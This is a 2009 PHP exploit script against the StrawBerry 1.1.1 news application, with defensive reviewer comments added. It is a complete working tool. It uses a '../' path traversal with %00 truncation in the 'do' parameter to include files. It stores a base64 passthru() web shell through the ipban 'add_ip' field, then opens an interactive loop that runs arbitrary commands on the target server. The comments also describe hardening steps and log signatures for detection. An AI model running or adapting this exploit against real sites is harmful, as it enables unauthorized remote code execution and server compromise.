
strawberry-lfiexec.txt

Posted on 15 May 2009

<?php
/*********************************************************************
 * StrawBerry 1.1.1 LFI / Remote Command Execution Exploit
 * Site: http://strawberry.goodgirl.ru/
 *********************************************************************
 * magic_quotes_gpc = Off
 *********************************************************************
 * Author: [AVT]
 * Date : 10.05.09
 * My Site: http://antichat.ru/
 *********************************************************************
 * Reviewer notes (defensive reading of this proof of concept)
 *
 * Weakness chain, as shown by the requests built below:
 *   1. Local file inclusion: the `do` query parameter of
 *      example/index.php is given a "../" traversal path ending in
 *      %00, so the application apparently uses it as an include path.
 *   2. Stored code execution: the ipban module's `add_ip` form field
 *      is sent PHP code instead of an IP address; the script then
 *      includes db/base/ipban.MYD through (1), so that value is
 *      apparently stored there unvalidated.
 *
 * Preconditions: the header states magic_quotes_gpc = Off. With it On,
 * PHP escapes the NUL byte in request data, and PHP 5.3.4 and later
 * reject file paths containing NUL bytes, so the %00 truncation only
 * applies to old runtimes.
 *
 * Hardening: map `do` to a fixed allow-list of module names instead of
 * a path; validate `add_ip` as an IP address before storing it (for
 * example filter_var() with FILTER_VALIDATE_IP); keep data files where
 * include() cannot reach them; enforce the admin session check inside
 * the ipban module itself, not only in the script that normally
 * loads it.
 *
 * Detection: access-log entries where `do=` carries "../" and "%00",
 * requests that name ipban.MYD or ipban.mdu, a `cmd=` parameter
 * holding base64 text, and ipban entries containing "<code>" or PHP
 * open tags.
 *********************************************************************/

// Remove the execution time limit; the interactive loop at the end runs until the operator quits.
set_time_limit(0);
// Silence all PHP diagnostics, including notices from the undefined variables used further down.
error_reporting(0);

// Positional CLI arguments: script name, target host, application base path.
// Note this runs before the argument-count check, so missing arguments are simply unset.
list($cli,$host,$path) = $argv;

// Wrong number of arguments: print the banner and usage text, then stop.
if ($argc != 3) {
    print " o-------------------------------------------------------------o ";
    print " | StrawBerry 1.1.1 LFI / Remote Command Execution Exploit | ";
    print " | Site: http://strawberry.goodgirl.ru/ | ";
    print " o-------------------------------------------------------------o ";
    print " | Author: [AVT] | ";
    print " | My Site: http://antichat.ru/ | ";
    print " o-------------------------------------------------------------o ";
    print " | Usage: php expl.php [host] [path] | ";
    print " | host localhost | ";
    print " | path /news/ | ";
    print " | Example: php expl.php site.com /news/ | ";
    print " o-------------------------------------------------------------o ";
    exit;
}

// Flow: probe the include; write the payload only if it is not already present; then enter the loop.
if (check_host ()) {
    post_shell();
}
use_shell();

/**
 * Probe whether the data file can be pulled in through the `do` parameter.
 *
 * Sends a GET for example/index.php with `do` set to a traversal path to
 * db/base/ipban.MYD followed by %00. Terminates the script with
 * "Exploit Failed!" when the response does not contain 'a:' (presumably
 * the start of serialized array data in that file; not confirmed by this
 * listing). Returns false when '<code>' is already in the response, which
 * is the marker post_shell() wraps its payload in; returns true otherwise.
 *
 * Reads the globals $host and $path.
 */
function check_host () {
    global $host,$path;
    // Log signature for defenders: "do=" combined with "../" sequences and a trailing "%00".
    $data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1 ";
    $data .= "Host: $host ";
    $data .= "Connection: close ";
    $html = send ($host,$data);
    if (!stristr($html,'a:')) {
        print " o-------------------------------------------------------------o ";
        print " | Exploit Failed! | ";
        print " o-------------------------------------------------------------o ";
        exit;
    } elseif (stristr($html,'<code>')) {
        // Marker already present in the included file: skip the write step.
        return false;
    } else {
        return true;
    }
}

/**
 * Write a raw request to $host on TCP port 80 and return everything read
 * back until the peer closes the connection.
 *
 * Plain HTTP only; the port is fixed. The @ operator hides the connect
 * warning and the script dies with a message when the socket cannot be
 * opened. $html is appended to without being initialised first.
 */
function send ($host,$data) {
    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused, try again! 
");
    }
    fputs($sock,$data);
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}

/**
 * Submit the ipban "add" form with PHP code in the `add_ip` field.
 *
 * The POST targets example/index.php with `do` pointing at
 * inc/mod/ipban.mdu via the same traversal and %00 suffix, i.e. the
 * module file is reached through the include rather than through its
 * normal entry point. The response is discarded. $data is appended to
 * without being initialised first.
 *
 * Defensive note: this request is the one that server-side validation of
 * `add_ip` as an IP address, or an access check inside the module,
 * would reject.
 */
function post_shell() {
    global $host,$path;
    // The stored value reads a `cmd` query parameter, base64-decodes it and passes it to passthru().
    $post = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban";
    $data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1 ";
    $data .= "Host: $host ";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 ";
    $data .= "Content-Type: application/x-www-form-urlencoded ";
    $data .= "Content-Length: ".strlen($post)." ";
    $data .= "$post ";
    send ($host,$data);
}

/**
 * Interactive loop: read one line from STDIN, stop on exit/quit (with or
 * without a leading "--", case-insensitive), otherwise hand the line to
 * exec_cmd() and print what it returns. Never returns to the caller.
 */
function use_shell() {
    while (1) {
        echo "[Shell]~$: ";
        $cmd = stripslashes(trim(fgets(STDIN)));
        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die(" Exited ");
        print exec_cmd($cmd);
    }
}

/**
 * Send one command through the stored payload and return its output.
 *
 * The command is base64-encoded and placed in the `cmd` query parameter
 * of a GET that also carries the `do` include of db/base/ipban.MYD. The
 * text between the <code> tags of the response is captured and the first
 * capture is returned. $data is appended to without being initialised.
 *
 * Defensive note: because `cmd` is base64, filters keyed on command
 * strings will not match; alert on the parameter combination
 * (`cmd=` together with a traversal in `do=`) instead.
 */
function exec_cmd($cmd) {
    global $host,$path;
    $cmd = base64_encode($cmd);
    $data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1 ";
    $data .= "Host: $host ";
    $data .= "Connection: close ";
    $html = send ($host,$data);
    preg_match_all('/<code>(.*)</code>/si', $html, $match);
    return $match[1][0];
}
?>

 
